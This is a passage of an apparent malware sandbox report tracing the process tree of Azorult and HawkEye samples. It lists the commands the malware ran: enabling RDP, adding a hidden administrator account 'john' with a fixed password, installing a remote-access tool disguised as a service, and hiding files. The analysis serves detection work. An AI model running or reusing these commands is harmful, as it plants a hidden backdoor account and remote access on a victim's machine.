- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
PID:6708 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x260,0x264,0x268,0x25c,0x2c4,0x7fffb232f208,0x7fffb232f214,0x7fffb232f2206⤵PID:5264
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1816,i,4751244063986537486,14346328621723357988,262144 --variations-seed-version --mojo-platform-channel-handle=2688 /prefetch:36⤵PID:3816
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2580,i,4751244063986537486,14346328621723357988,262144 --variations-seed-version --mojo-platform-channel-handle=2572 /prefetch:26⤵PID:1132
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=1900,i,4751244063986537486,14346328621723357988,262144 --variations-seed-version --mojo-platform-channel-handle=2696 /prefetch:86⤵PID:2100
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3440,i,4751244063986537486,14346328621723357988,262144 --variations-seed-version --mojo-platform-channel-handle=3480 /prefetch:16⤵PID:2676
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3464,i,4751244063986537486,14346328621723357988,262144 --variations-seed-version --mojo-platform-channel-handle=3512 /prefetch:16⤵PID:2472
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --always-read-main-dll --field-trial-handle=4028,i,4751244063986537486,14346328621723357988,262144 --variations-seed-version --mojo-platform-channel-handle=4516 /prefetch:16⤵PID:2660
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --extension-process --renderer-sub-type=extension --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --always-read-main-dll --field-trial-handle=4036,i,4751244063986537486,14346328621723357988,262144 --variations-seed-version --mojo-platform-channel-handle=4520 /prefetch:26⤵PID:3012
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=3508,i,4751244063986537486,14346328621723357988,262144 --variations-seed-version --mojo-platform-channel-handle=4756 /prefetch:86⤵PID:4396
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=3548,i,4751244063986537486,14346328621723357988,262144 --variations-seed-version --mojo-platform-channel-handle=5248 /prefetch:86⤵PID:5344
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5396,i,4751244063986537486,14346328621723357988,262144 --variations-seed-version --mojo-platform-channel-handle=5468 /prefetch:86⤵PID:4716
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5444,i,4751244063986537486,14346328621723357988,262144 --variations-seed-version --mojo-platform-channel-handle=5460 /prefetch:86⤵PID:4516
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --always-read-main-dll --field-trial-handle=3592,i,4751244063986537486,14346328621723357988,262144 --variations-seed-version --mojo-platform-channel-handle=4688 /prefetch:16⤵PID:7148
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=600,i,4751244063986537486,14346328621723357988,262144 --variations-seed-version --mojo-platform-channel-handle=2504 /prefetch:86⤵PID:7276
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=1232,i,4751244063986537486,14346328621723357988,262144 --variations-seed-version --mojo-platform-channel-handle=6164 /prefetch:86⤵PID:7316
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=776,i,4751244063986537486,14346328621723357988,262144 --variations-seed-version --mojo-platform-channel-handle=4004 /prefetch:86⤵PID:7300
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=2504,i,4751244063986537486,14346328621723357988,262144 --variations-seed-version --mojo-platform-channel-handle=4504 /prefetch:86⤵PID:4640
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=2504,i,4751244063986537486,14346328621723357988,262144 --variations-seed-version --mojo-platform-channel-handle=4504 /prefetch:86⤵PID:4544
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5636,i,4751244063986537486,14346328621723357988,262144 --variations-seed-version --mojo-platform-channel-handle=5464 /prefetch:86⤵PID:7200
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-US --service-sandbox-type=search_indexer --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5632,i,4751244063986537486,14346328621723357988,262144 --variations-seed-version --mojo-platform-channel-handle=6456 /prefetch:86⤵PID:7668
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6488,i,4751244063986537486,14346328621723357988,262144 --variations-seed-version --mojo-platform-channel-handle=6624 /prefetch:86⤵PID:4840
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5392,i,4751244063986537486,14346328621723357988,262144 --variations-seed-version --mojo-platform-channel-handle=6180 /prefetch:86⤵PID:7964
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4984,i,4751244063986537486,14346328621723357988,262144 --variations-seed-version --mojo-platform-channel-handle=6296 /prefetch:86⤵PID:1764
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6240,i,4751244063986537486,14346328621723357988,262144 --variations-seed-version --mojo-platform-channel-handle=6716 /prefetch:86⤵PID:7140
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6664,i,4751244063986537486,14346328621723357988,262144 --variations-seed-version --mojo-platform-channel-handle=6732 /prefetch:86⤵PID:988
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6724,i,4751244063986537486,14346328621723357988,262144 --variations-seed-version --mojo-platform-channel-handle=4568 /prefetch:86⤵PID:7352
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7184,i,4751244063986537486,14346328621723357988,262144 --variations-seed-version --mojo-platform-channel-handle=7192 /prefetch:86⤵PID:6720
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4560,i,4751244063986537486,14346328621723357988,262144 --variations-seed-version --mojo-platform-channel-handle=4108 /prefetch:86⤵PID:7364
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.4355 --string-annotations --gpu-preferences=UAAAAAAAAADoAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAABCAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=5536,i,4751244063986537486,14346328621723357988,262144 --variations-seed-version --mojo-platform-channel-handle=6332 /prefetch:86⤵PID:1956
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4508,i,4751244063986537486,14346328621723357988,262144 --variations-seed-version --mojo-platform-channel-handle=6232 /prefetch:86⤵PID:3556
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5084,i,4751244063986537486,14346328621723357988,262144 --variations-seed-version --mojo-platform-channel-handle=1064 /prefetch:86⤵PID:5160
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5844,i,4751244063986537486,14346328621723357988,262144 --variations-seed-version --mojo-platform-channel-handle=5848 /prefetch:86⤵PID:4964
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=1820,i,4751244063986537486,14346328621723357988,262144 --variations-seed-version --mojo-platform-channel-handle=5508 /prefetch:86⤵PID:3120
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=3144,i,4751244063986537486,14346328621723357988,262144 --variations-seed-version --mojo-platform-channel-handle=6792 /prefetch:86⤵PID:8424
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=1696,i,4751244063986537486,14346328621723357988,262144 --variations-seed-version --mojo-platform-channel-handle=5104 /prefetch:86⤵PID:7456
-
-
-
-
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=6480,i,6539032302794548774,280739568161154191,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=6068 /prefetch:82⤵PID:3068
-
-
C:\Users\Admin\Downloads\HawkEye (1).exe"C:\Users\Admin\Downloads\HawkEye (1).exe"2⤵
- Executes dropped EXE
PID:6640
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=6696,i,6539032302794548774,280739568161154191,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=6712 /prefetch:82⤵PID:792
-
-
C:\Users\Admin\Downloads\Azorult.exe"C:\Users\Admin\Downloads\Azorult.exe"2⤵
- Modifies Windows Defender Real-time Protection settings
- UAC bypass
- Blocks application from running via registry modification
- Drops file in Drivers directory
- Checks computer location settings
- Executes dropped EXE
- Checks whether UAC is enabled
- Modifies WinLogon
- Hide Artifacts: Hidden Users
- Suspicious behavior: EnumeratesProcesses
- System policy modification
PID:6848 -
C:\ProgramData\Microsoft\Intel\wini.exeC:\ProgramData\Microsoft\Intel\wini.exe -pnaxui3⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
PID:3952 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\install.vbs"4⤵
- Checks computer location settings
PID:3220 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Programdata\Windows\install.bat" "5⤵
- System Location Discovery: System Language Discovery
PID:5600 -
C:\Windows\SysWOW64\regedit.exeregedit /s "reg1.reg"6⤵
- UAC bypass
- Windows security bypass
- Hide Artifacts: Hidden Users
- Runs .reg file with regedit
PID:2492
-
-
C:\Windows\SysWOW64\regedit.exeregedit /s "reg2.reg"6⤵
- Runs .reg file with regedit
PID:2044
-
-
C:\Windows\SysWOW64\timeout.exetimeout 26⤵
- Delays execution with timeout.exe
PID:3884
-
-
C:\ProgramData\Windows\rutserv.exerutserv.exe /silentinstall6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:824
-
-
C:\ProgramData\Windows\rutserv.exerutserv.exe /firewall6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:4536
-
-
C:\ProgramData\Windows\rutserv.exerutserv.exe /start6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:3544
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S C:\Programdata\Windows\*.*6⤵
- Views/modifies file attributes
PID:4304
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S C:\Programdata\Windows6⤵
- Views/modifies file attributes
PID:3872
-
-
C:\Windows\SysWOW64\sc.exesc failure RManService reset= 0 actions= restart/1000/restart/1000/restart/10006⤵
- Launches sc.exe
PID:4528
-
-
C:\Windows\SysWOW64\sc.exesc config RManService obj= LocalSystem type= interact type= own6⤵
- Launches sc.exe
PID:7036
-
-
C:\Windows\SysWOW64\sc.exesc config RManService DisplayName= "Microsoft Framework"6⤵
- Launches sc.exe
PID:3972
-
-
-
-
C:\ProgramData\Windows\winit.exe"C:\ProgramData\Windows\winit.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
PID:3556 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Programdata\Install\del.bat5⤵PID:2976
-
C:\Windows\SysWOW64\timeout.exetimeout 56⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:1376
-
-
-
-
-
C:\programdata\install\cheat.exeC:\programdata\install\cheat.exe -pnaxui3⤵
- Checks computer location settings
- Executes dropped EXE
PID:7072 -
C:\ProgramData\Microsoft\Intel\taskhost.exe"C:\ProgramData\Microsoft\Intel\taskhost.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
PID:3268 -
C:\programdata\microsoft\intel\P.exeC:\programdata\microsoft\intel\P.exe5⤵
- Executes dropped EXE
PID:5592
-
-
C:\programdata\microsoft\intel\R8.exeC:\programdata\microsoft\intel\R8.exe5⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
PID:5296 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\rdp\run.vbs"6⤵
- Checks computer location settings
PID:5620 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\rdp\pause.bat" "7⤵
- Checks computer location settings
- Modifies registry class
PID:1720 -
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Rar.exe8⤵
- Kills process with taskkill
PID:7408
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Rar.exe8⤵
- Kills process with taskkill
PID:7796
-
-
C:\Windows\SysWOW64\timeout.exetimeout 38⤵
- Delays execution with timeout.exe
PID:600
-
-
C:\Windows\SysWOW64\chcp.comchcp 12518⤵
- System Location Discovery: System Language Discovery
PID:6316
-
-
C:\rdp\Rar.exe"Rar.exe" e -p555 db.rar8⤵
- Executes dropped EXE
PID:7788
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Rar.exe8⤵
- Kills process with taskkill
PID:2880
-
-
C:\Windows\SysWOW64\timeout.exetimeout 28⤵
- Delays execution with timeout.exe
PID:8148
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\rdp\install.vbs"8⤵
- Checks computer location settings
PID:2452 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\rdp\bat.bat" "9⤵PID:7304
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0 /f10⤵PID:6324
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fAllowToGetHelp" /t REG_DWORD /d 1 /f10⤵
- System Location Discovery: System Language Discovery
PID:8104
-
-
C:\Windows\SysWOW64\netsh.exenetsh.exe advfirewall firewall add rule name="allow RDP" dir=in protocol=TCP localport=3389 action=allow10⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:5420
-
-
C:\Windows\SysWOW64\net.exenet.exe user "john" "12345" /add10⤵
- System Location Discovery: System Language Discovery
PID:5500 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 user "john" "12345" /add11⤵PID:2392
-
-
-
C:\Windows\SysWOW64\chcp.comchcp 125110⤵PID:560
-
-
C:\Windows\SysWOW64\net.exenet localgroup "Администраторы" "John" /add10⤵PID:6044
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Администраторы" "John" /add11⤵PID:5208
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup "Administratorzy" "John" /add10⤵PID:4504
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Administratorzy" "John" /add11⤵PID:4340
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup "Administrators" John /add10⤵PID:7572
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Administrators" John /add11⤵PID:6312
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup "Administradores" John /add10⤵PID:7804
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Administradores" John /add11⤵
- System Location Discovery: System Language Discovery
PID:5584
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup "Пользователи удаленного рабочего стола" John /add10⤵PID:7324
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Пользователи удаленного рабочего стола" John /add11⤵PID:7732
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup "Пользователи удаленного управления" John /add10⤵PID:5344
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Пользователи удаленного управления" John /add11⤵PID:7240
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup "Remote Desktop Users" John /add10⤵
- Remote Service Session Hijacking: RDP Hijacking
PID:3084 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Remote Desktop Users" John /add11⤵
- Remote Service Session Hijacking: RDP Hijacking
PID:5012
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup "Usuarios de escritorio remoto" John /add10⤵PID:6660
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Usuarios de escritorio remoto" John /add11⤵
- System Location Discovery: System Language Discovery
PID:520
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup "Uzytkownicy pulpitu zdalnego" John /add10⤵PID:3776
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Uzytkownicy pulpitu zdalnego" John /add11⤵PID:8028
-
-
-
C:\rdp\RDPWInst.exe"RDPWInst.exe" -i -o10⤵
- Server Software Component: Terminal Services DLL
- Executes dropped EXE
- Modifies WinLogon
- Drops file in System32 directory
PID:3784 -
C:\Windows\SYSTEM32\netsh.exenetsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow11⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:7308
-
-
-
C:\rdp\RDPWInst.exe"RDPWInst.exe" -w10⤵
- Executes dropped EXE
PID:7300
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "john" /t REG_DWORD /d 0 /f10⤵
- Hide Artifacts: Hidden Users
PID:6368
-
-
C:\Windows\SysWOW64\net.exenet accounts /maxpwage:unlimited10⤵PID:4692
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 accounts /maxpwage:unlimited11⤵
- System Location Discovery: System Language Discovery
PID:7756
-
-
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h "C:\Program Files\RDP Wrapper\*.*"10⤵
- Sets file to hidden
- Views/modifies file attributes
PID:4512
-
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h "C:\Program Files\RDP Wrapper"10⤵
- Sets file to hidden
- Views/modifies file attributes
PID:5796
-
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h "C:\rdp"10⤵
- Sets file to hidden
- Views/modifies file attributes
PID:8064
-
-
-
-
C:\Windows\SysWOW64\timeout.exetimeout 28⤵
- Delays execution with timeout.exe
PID:7012
-
-
-
-
-
C:\ProgramData\Microsoft\Intel\winlog.exeC:\ProgramData\Microsoft\Intel\winlog.exe -p1235⤵
- Checks computer location settings
- Executes dropped EXE
PID:8028 -
C:\ProgramData\Microsoft\Intel\winlogon.exe"C:\ProgramData\Microsoft\Intel\winlogon.exe"6⤵
- Checks computer location settings
- Executes dropped EXE
PID:5740 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\8BAD.tmp\8BAE.bat C:\ProgramData\Microsoft\Intel\winlogon.exe"7⤵PID:7548
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell.exe -command "Import-Module applocker" ; "Set-AppLockerPolicy -XMLPolicy C:\ProgramData\microsoft\Temp\5.xml"8⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
PID:7656
-
-
-
-
-
C:\Programdata\RealtekHD\taskhostw.exeC:\Programdata\RealtekHD\taskhostw.exe5⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- NTFS ADS
- Suspicious behavior: GetForegroundWindowSpam
PID:5984 -
C:\Programdata\WindowsTask\winlogon.exeC:\Programdata\WindowsTask\winlogon.exe6⤵
- Executes dropped EXE
PID:7732 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /C schtasks /query /fo list7⤵PID:7396
-
C:\Windows\SysWOW64\schtasks.exeschtasks /query /fo list8⤵PID:7672
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ipconfig /flushdns6⤵PID:7192
-
C:\Windows\system32\ipconfig.exeipconfig /flushdns7⤵
- Gathers network information
PID:188
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c gpupdate /force6⤵PID:6820
-
